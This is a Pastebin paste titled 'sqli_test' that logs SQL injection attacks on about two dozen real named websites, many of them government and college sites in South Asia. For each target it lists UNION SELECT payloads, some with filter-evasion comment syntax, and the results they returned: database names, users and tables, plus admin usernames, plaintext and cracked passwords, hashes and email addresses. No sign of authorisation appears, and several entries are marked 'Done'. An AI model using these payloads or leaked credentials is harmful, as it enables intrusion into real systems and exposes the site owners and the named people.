API tools faq
paste
Advertisement
sqli_test

Inject

sqli_test
Jul 10th, 2017
795
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.86 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Targets :
  3. 1. http://ssy.org/detail.php?id=1 --> Done
  4. 2. http://www.ntl.gov.bd/index.php?id=37 --> Done
  5. 3. http://www.jisa.ac.in/gallery.php?id=%27 --> Done
  6. 4. http://www.emmanuelbedcollege.ac.in/gallery.php?id=5 --> Done
  7. 5. https://www.vgu.ac.in/photo-gallery.php?id=1 --> Done
  8. 6. http://www.maldacollege.ac.in/current-news.php?id=35
  9. 7. http://www.firesystemsa.com/news.php?id=6 -->done
  10. 8. http://rrgroup.com.pk/page.php?id=19
  11. 9. http://www.multan.gov.pk/files.php?id=1
  12. 10. http://rismfp.gov.np/content.php?id=326
  13. 11. http://www.kovaidiabetes.in/content.php?id=1 --> done
  14. 11. http://www.berdu.ac.bd/product_view.php?id=33 --> Done
  15. 12. http://sincrono.co.in/constructions/gallery-list.php?id=6
  16. 13. http://www.dreamskitchen.co.in/gallery.php?id=2
  17. 14. https://www.naipunnya.edu.in/view_gallery.php?id=32
  18. 15. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> DOne
  19. 16. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> Done
  20. 17. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=92 --> Done
  21. 18. http://www.baramacollege.ac.in/department.php?id=2
  22. 19. http://www.turnthepage.in/detail.php?bookId=147 --> Done
  23. 20. http://www.mrpc.co.in/users_article.php?id=3 --> Done
  24. 21. http://cvrce.edu.in/photo_gallery.php?id=91
  25. 22. http://wctmgurgaon.org/photo-gallery.php?id=36 --> Done
  26. 23. http://rismfp.gov.np/content.php?id=326 --> done
  27. 24. http://www.moha.gov.np/en/map/contact.php?district=Gulmi
  28.  
  29. 1.http://ssy.org/detail.php?id=-1' UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13--+
  30. database: joshient_datassy
  31. user: joshient_ssyuser@localhost
  32. version : 5.5.55-cll
  33. https://pastebin.com/0czVr9pm //mero
  34.  
  35. http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+
  36. article,audios,careers,category,category_master,centre,city,contact,country,donate_item,donate_master,donations,enquiry,enroll_list,events,faqs,feedback,festivals,guruvani,image_album,item_master,item_master_old,language,level0,level1,level2,level3,level4,level5,livevideo,media,place,registerevent,schedule,schedule_old,serveitems,slider_images,state,step1,step2,step3,step4,st
  37. subcategory,testimonial,type,upnishad,users,video_gallery,videos,wallpaper,wishto_gift
  38.  
  39. http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name='users'--+
  40. id,name,email,password,approval
  41.  
  42. http://ssy.org/detail.php?id=-1' union select 1,2,3,password,5,6,7,8,9,10,11,12,13 from users--+
  43. 8881212#@$%
  44.  
  45. http://ssy.org/detail.php?id=-1' union select 1,2,3,email,5,6,7,8,9,10,11,12,13 from users--+
  46. admin@ssy.org
  47.  
  48. http://ssy.org/detail.php?id=-1' union select 1,2,3,name,5,6,7,8,9,10,11,12,13 from users--+
  49. admin
  50.  
  51.  
  52. http://ssy.org/detail.php?id=-1' union select 1,2,3,approval,5,6,7,8,9,10,11,12,13 from users--+
  53. 3
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61. 2.
  62. http://www.ntl.gov.bd
  63.  
  64. http://www.ntl.gov.bd/index.php?id=37' order by 12 --+
  65.  
  66. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+
  67. -> 3
  68. vulnerable column
  69.  
  70. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12--+
  71. ->ntlgov_xcnmuytg
  72.  
  73. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12--+
  74. -> ntlgov_bngferyx@localhost
  75.  
  76. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+
  77. -> 5.6.35
  78.  
  79. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--+
  80. -> banner,box,comp_name,image_gellary,left_menu,news,user
  81.  
  82. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name='user'--+
  83. -->id,user,pass
  84.  
  85. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user,4,5,6,7,8,9,10,11,12 from user--+
  86. --> Ntl@2011%
  87.  
  88. http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,pass,4,5,6,7,8,9,10,11,12 from user--+
  89. -->NtL@20#I*
  90.  
  91.  
  92.  
  93.  
  94. TArget 3:
  95. http://www.jisa.ac.in/gallery.php?id=%27 order by 10--+
  96. --> 10 columns
  97.  
  98. http://www.jisa.ac.in/gallery.php?id=%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10--+
  99. --> column 4 is vulnerable
  100.  
  101. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,database(),5,6,7,8,9,10--+
  102. -->jisa_db
  103.  
  104. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,version(),5,6,7,8,9,10--+
  105. -->5.5.50-cll
  106.  
  107. http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,user(),5,6,7,8,9,10--+
  108. --> jisa_root@localhost
  109.  
  110. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--+
  111. -->gallery,gallery_more,jisa_enquiry_form,jisa_gallery,jisa_gallery_category,jisa_news_events,jisa_tbl_m_user,tbl_m_user,whats_new
  112.  
  113.  
  114. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name = 'jisa_tbl_m_user'--+
  115. --> USER_ID,STATUS,USER_NAME,USER_PASS,F_NAME,L_NAME,ADDRESS_LINE,CITY_AREA,STATE_ID,DIST_ID,BLOCK_ID,VILL_ID,EMAIL_ID,PHONE_NO,MOBILE_NO,CREATE_DATE_TIME,MODIFY_DATE_TIME,CREATED_BY,SUPPER_ADMIN
  116.  
  117. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_PASS,5,6,7,8,9,10 from jisa_tbl_m_user--+
  118. -->admin!@#
  119.  
  120. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_NAME,5,6,7,8,9,10 from jisa_tbl_m_user--+
  121. -->admin
  122.  
  123.  
  124. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name='tbl_m_user'--+
  125. --> ID,USER_NAME,USER_PASS,F_NAME,L_NAME,STATUS,SHOWS
  126.  
  127. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_NAME)),5,6,7,8,9,10 from tbl_m_user--+
  128. --> jisa
  129.  
  130. http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_PASS)),5,6,7,8,9,10 from tbl_m_user--+
  131. --> 650855ed68c9d033bf0ffbcd462f2e2b
  132.  
  133.  
  134.  
  135. Target 4:
  136. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,2,3,4,5--+
  137. ->2
  138.  
  139. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,database(),3,4,5--+
  140. --> emma0812_BeDCol
  141.  
  142. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,user(),3,4,5--+
  143. --> emma0812_AdMi12@localhost
  144.  
  145. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,version(),3,4,5--+
  146. --> 5.6.35
  147.  
  148.  
  149. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
  150. --> emc_admin_login,emc_configure,emc_news_updates,emc_photo_category,emc_photo_gallery
  151.  
  152.  
  153.  
  154. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5 from information_schema.columns where table_name = 'emc_admin_login'--+
  155. --> ad_id,ad_user,ad_password,ad_status
  156.  
  157. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_user)),3,4,5 from emc_admin_login--+
  158. --> admin
  159.  
  160. http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_password)),3,4,5 from emc_admin_login--+
  161. --> admin2601
  162.  
  163.  
  164.  
  165. Target 5:
  166.  
  167. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,2,3,4,5,6--+
  168. --> 2
  169.  
  170. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,database(),3,4,5,6--+
  171. --> vguac_web
  172.  
  173. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,user(),3,4,5,6--+
  174. --> vguac_webuser@localhost
  175.  
  176. version ;5.5.55-cll
  177.  
  178.  
  179. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6 from information_schema.tables where table_schema=database()--+
  180. --> admission_query,admission_query_leads,contactus,events,gallery_album,gallery_album_images,header_notification,login_user,management_lp,news_placement,online_admission,rajeshthan_board,register,tbl_user,ug_lp,ug_lp_leads
  181.  
  182.  
  183. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6 from information_schema.columns where table_name='login_user'--+
  184. -> id,username,password,created
  185.  
  186.  
  187. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(username)),3,4,5,6 from login_user--+
  188. -->admin
  189.  
  190. https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(password)),3,4,5,6 from login_user--+
  191. -> 5fec4ba8376f207d1ff2f0cac0882b01 --> admin!@#
  192.  
  193.  
  194.  
  195. Target 6:
  196. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,2,3,4 --+
  197. --> 2,3,4
  198.  
  199. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,version(),3,4 --+
  200. --> 5.5.45-37.4
  201.  
  202. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,database(),3,4 --+
  203. --> maldacol_maldacollege
  204.  
  205. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,user(),3,4 --+
  206. --> maldacol_test@localhost
  207.  
  208.  
  209. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4 from information_schema.tables where table_schema=database()--+
  210. --> admission_notice,album,alumni_detail,archive,change_banner,deprtment_faculty,examination,faculty_assignment,faculty_event,faculty_table,
  211. feedback_details,image_upload,imp_links,index_banner,index_body,indexnews,internal_notice,newpages,news,non_teaching,notice_upload,pdesk,phone,photo_gallery,question_paper,
  212. self_study,seo,sms,student_information,sub_nav,tender_table,third_nav,top_nav,upload_results,user_annoncement,user_details,user_role
  213.  
  214.  
  215. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4 from information_schema.columns where table_name= 'user_details'--+
  216. -->
  217. id,user_unique_id,user_full_name,user_name,user_password,status,user_role,user_email
  218.  
  219. http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(user_name))),3,4 from user_details--+
  220. --> admin , sadmin
  221.  
  222. pass -> 3d7CypONoJmfmQ%3D%3D , 3d7CypONoJmfmQ%3D%3D
  223. email -> suraj.sharma@magicnines.com
  224.  
  225. Target 7:
  226. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT version() --+
  227. --> 5.6.35
  228.  
  229. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT database() --+
  230. --> femv_firesystemsacom
  231.  
  232. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT user() --+
  233. --> femv_fs2011@h2web84.infomaniak.ch
  234.  
  235.  
  236. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=database() --+
  237. --> accueil,categories_files,categories_organigramme,categories_prestations,categories_regions,contact,membres,
  238. membres_files,news,news_files,news_images,organigramme,prestations,prestations_files,prestations_images,references,
  239. references_images,regions_organigramme,regions_references
  240.  
  241. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(column_name))) from information_schema.columns where table_name='membres' --+
  242. --> id,nom,login,pass
  243.  
  244. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(login)) from membres --+
  245. --> emilie
  246.  
  247. http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(pass)) from membres --+
  248. --> emilie
  249.  
  250.  
  251.  
  252. Target 8:
  253.  
  254. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,2,3,4,5--+
  255. --> 5,2
  256.  
  257. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,database(),3,4,5--+
  258. --> rrgroupc_webportal
  259.  
  260. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,user(),3,4,5--+
  261. --> rrgroupc_webuser@localhost
  262.  
  263. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,version(),3,4,5--+
  264. --> 5.6.36-cll-lve
  265.  
  266. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
  267. --> adminuser,category,gallery,gallerycontent,menu,news,page,project_page,settings,siteimage,siteimagetype
  268.  
  269. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e75736572 --+
  270. --> UserID,UserName,Email,Password,IsAdmin
  271.  
  272. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(UserName)),3,4,5 from adminuser --+
  273. --> admin
  274. http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(Password)),3,4,5 from adminuser --+
  275. --> 7baa5cfe568230421e96c0d326bed94f --> RRG@3F3F
  276.  
  277. Email --> fozia@3ftchnologies.com
  278.  
  279.  
  280. Target 9:
  281. http://www.multan.gov.pk/files.php?id=-1 /**//*!12345UNION SELECT*//**/1,2--+
  282. --> 2
  283. version: 5.5.51-38.2
  284. user: multango_user@localhost
  285. databse: multango_db
  286.  
  287.  
  288.  
  289. Target 10:
  290. http://rismfp.gov.np/content.php?id=-326' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  291. --> 4, 8
  292.  
  293.  
  294.  
  295.  
  296.  
  297. TArget 10:
  298. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,2,3,4,5,6,7--+
  299. -->2, 4
  300.  
  301. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,version(),3,4,5,6,7--+
  302. -->
  303. 5.5.51-38.2
  304.  
  305.  
  306. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,database(),3,4,5,6,7--+
  307. -->mohitmin_mymin
  308.  
  309.  
  310. user() --> mohitmin_mmnin@localhost
  311.  
  312.  
  313.  
  314. http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,table_name,3,4,5,6,7 from /*!information_schema*/.tables where table_schema = database()--+
  315. -->
  316. srs_business
  317.  
  318.  
  319.  
  320.  
  321.  
  322. Target 11:
  323. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6--+
  324. --> 5
  325.  
  326. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,database(),6--+
  327. --> kovaisug_kovaidia
  328.  
  329. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,user(),6--+
  330. --> kovaisug_users@localhost
  331.  
  332. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,version(),6--+
  333. --> 5.6.34-log
  334.  
  335. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--+
  336. --> admin,clients,cms,configuration,facilities_details,
  337. facilities_title,gallery_details,gallery_title,news
  338.  
  339. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='admin'--+
  340. --> id,username,password
  341.  
  342. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,username,6 from admin--+
  343. --> pmgadmin
  344.  
  345. http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,password,6 from admin--+
  346. --> 2d27ad3469fbd6a5126fbfe64268f3c6 -->083022
  347.  
  348.  
  349.  
  350.  
  351. Target 11:
  352. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,4,5--+
  353. --> 1,4
  354.  
  355. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,version(),5--+
  356. --> 5.6.35-log
  357.  
  358. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,database(),5--+
  359. --> berduac_nduals
  360. --> user: berduac_gfrf2016@localhost
  361.  
  362. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema= database()--+
  363. --> banner,image_gellary,left_menu,news,rcategory,research,training,user
  364.  
  365.  
  366.  
  367.  
  368. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='user'--+
  369. --> id,user,pass
  370.  
  371.  
  372.  
  373. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,user,5 from user--+
  374. --> admin_ber
  375.  
  376.  
  377. http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,pass,5 from user--+
  378. --> ber_u200008
  379.  
  380.  
  381.  
  382. Target 12;
  383. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,2,3,4,5,6--+
  384. --> 2
  385.  
  386. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,version(),3,4,5,6--+
  387. --> 5.6.35-cll-lve
  388.  
  389.  
  390. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,database(),3,4,5,6--+
  391. --> sincrono
  392.  
  393.  
  394. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,user(),3,4,5,6--+
  395. --> sincornouser@localhost
  396.  
  397. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema= database()--+
  398. dotp_billingcode,dotp_common_notes,dotp_companies,dotp_config,dotp_config_list,dotp_contacts,dotp_custom_fields_lists,dotp_custom_fields_struct,dotp_custom_fields_values,dotp_departments,dotp_dotpermissions,dotp_dpversion,dotp_event_queue,dotp_events,dotp_file_folders,dotp_files,dotp_files_index,dotp_forum_messages,
  399. dotp_forum_visits,dotp_f
  400.  
  401. http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name= 'dotp_dotpermissions' --+
  402. --> acl_id,user_id,section,axo,permission,allow,priority,enabled
  403.  
  404.  
  405.  
  406.  
  407.  
  408. Target 13:
  409. http://www.dreamskitchen.co.in/gallery.php?id=2 +/*!UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11--+
  410. --> 3
  411.  
  412.  
  413. TArget 14:
  414.  
  415. https://www.naipunnya.edu.in/view_gallery.php?id=-32' +/*!UNION*/+ALL+SELECT+1,2,3,4,5 --+
  416. -->2
  417.  
  418.  
  419.  
  420.  
  421.  
  422.  
  423. Target 15:
  424.  
  425.  
  426. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9 --+
  427. --> 3, 6
  428.  
  429.  
  430. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9 --+
  431. --> 5.5.42-MariaDB
  432.  
  433. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,database(),4,5,user(),7,8,9 --+
  434. --> goldenga_ggic : goldenga_user@localhost
  435. admin panel: http://www.goldengate.edu.np/myadmin
  436.  
  437.  
  438. taregt 16: Done
  439.  
  440.  
  441.  
  442. --> goldengate_admin,goldengate_album,goldengate_banner,goldengate_category,goldengate_category_type,goldengate_content,
  443. goldengate_country,goldengate_download,goldengate_faculty,goldengate_grade,goldengate_level,goldengate_news,
  444.  
  445.  
  446. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(column_name) ,4,5,6,7,8,9 from information_schema.columns where table_name='goldengate_admin' --+
  447. --> admin_id,admin_fname,admin_lname,admin_name,password,date,last_login,last_ip,
  448. status,access,email,logo
  449. goldengate_photo,goldengate_result,goldengate_
  450. section,goldengate_settings,goldengate_shift,goldengate_student
  451.  
  452. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(admin_name,': ',password) ,4,5,6,7,8,9 from goldengate_admin--+
  453. --> myadmin : myadmin0987
  454.  
  455.  
  456.  
  457.  
  458.  
  459. TArget 17: done
  460. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
  461. --> 4, 6
  462. Database: ilovetr1_data
  463.  
  464. Version:5.5.51-38.2
  465. user:ilovetr1_data@localhost
  466.  
  467. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,table_name,5,6,7,8 /*!from*/ /*!12345information_schema.tables*/ /*!50000where+*//*!50000table_schema*/ = database()--+
  468. --> admin
  469.  
  470. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 1,10--+
  471. --> admin_id
  472.  
  473. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 2,4--+
  474. --> admin_password
  475.  
  476. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_id,5,6,7,8 /*!from*/ admin --+
  477. --> admin
  478.  
  479. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_password,5,6,7,8 /*!from*/ admin --+
  480. --> 033856d3cabb789c7550fff9f0c96ec4 --> admin321iltn
  481.  
  482.  
  483.  
  484. TArget 18: Firewall: Blocks IP :D
  485. http://www.baramacollege.ac.in/department.php?id=-2 +/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3--+
  486. --> 2,3
  487. version() --> 5.5.56-cll-lve
  488. user() -->
  489. databse() -->
  490.  
  491.  
  492.  
  493. Target 19: done
  494. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
  495. --> 2,4,9
  496. Version() --> 10.1.25-MariaDB
  497. user() --> turnthep_jyotsna@localhost
  498. databse() --> turnthep_turnthepage
  499.  
  500.  
  501. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema = database()--+
  502. --> admin,billingaddress,bookcategory,bookorder,bookorder27may,bookpickup,bookpickup27may,bookreview,
  503. books,contact,membershipcat,membershipplan,newsletter,notification,planexpire,purchases,shippingaddress,user
  504.  
  505. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name = 'admin'--+
  506. --> admin_id,FirstName,MiddleName,LastName,MobileNo,username,password
  507.  
  508. http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat( username, ' : ', password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin--+
  509. --> admin : TVVMVElQQVNT
  510.  
  511. TArget 20: done
  512.  
  513. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,2,3,4--+
  514. --> 2
  515.  
  516. database --> jadon_mrpc
  517. version --> 5.1.73-community
  518. user --> jadon_mrpc@CloudSun.serversfarm.com
  519.  
  520. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()--+
  521. -->mrpc_admin,mrpc_content,mrpc_district,mrpc_event,mrpc_events,mrpc_feedback,mrpc_member,
  522. mrpc_membership,mrpc_news,mrpc_photo_gallery,mrpc_state,mrpc_user,mrpc_user_article
  523.  
  524. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(column_name),3,4 from information_schema.columns where table_name= 'mrpc_admin'--+
  525. --> id,uname,pass,email
  526.  
  527. http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(uname, ' : ' ,pass, ' : ' ,email),3,4 from mrpc_admin--+
  528. --> admin : shin0bi : info.jadontech@gmail.com
  529.  
  530.  
  531. Target21: not done
  532. http://cvrce.edu.in/photo_gallery.php?id=91%27 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+
  533. --> 1
  534.  
  535. database() --> cvrceedu_gicvbhu'@'localhost
  536.  
  537.  
  538.  
  539.  
  540. TArget 22: DONE
  541. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,3,4,5,6,7--+
  542. --> 3
  543. version() ;User() : database() --> 5.5.55-cll: wctmorg_cog@localhost : wctmorg_db
  544.  
  545. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema = database()--+
  546. --> alumni_registration,career,contact,gallery,getplace,getplacement,innerimages,landing_page_wctm,login,login_user,notice_board,online_enquiry,protection,question_paper,tbl_user
  547.  
  548.  
  549.  
  550. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login'--+
  551. --> id,pass,email,download
  552. --> wctm101 : wctmgurgaon@gmail.com
  553.  
  554.  
  555.  
  556. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login_user'--+
  557. --> id,username,password,created
  558.  
  559.  
  560.  
  561. http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(username,' : ', password),4,5,6,7 from login_user--+
  562. --> aDmiN : 5d750327786d41f330960062d3c25fd454a33c1e --> admin!@#
  563.  
  564.  
  565.  
  566. target 23:
  567.  
  568. ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,2,3,4,5,6,7--+
  569. --> 2,7,4
  570.  
  571. ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,version(),3,user(),5,6,database()--+
  572. -->ptpkpgov_police : 5.5.51-38.2 : ptpkpgov_police@localhost
  573.  
  574.  
  575.  
  576. TArget 24:
  577.  
  578. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  579. --> 4,8
  580.  
  581.  
  582. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,table_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000tables+*/where /*!50000table_schema*/ = database limit 31,31--+
  583. -->usertable
  584.  
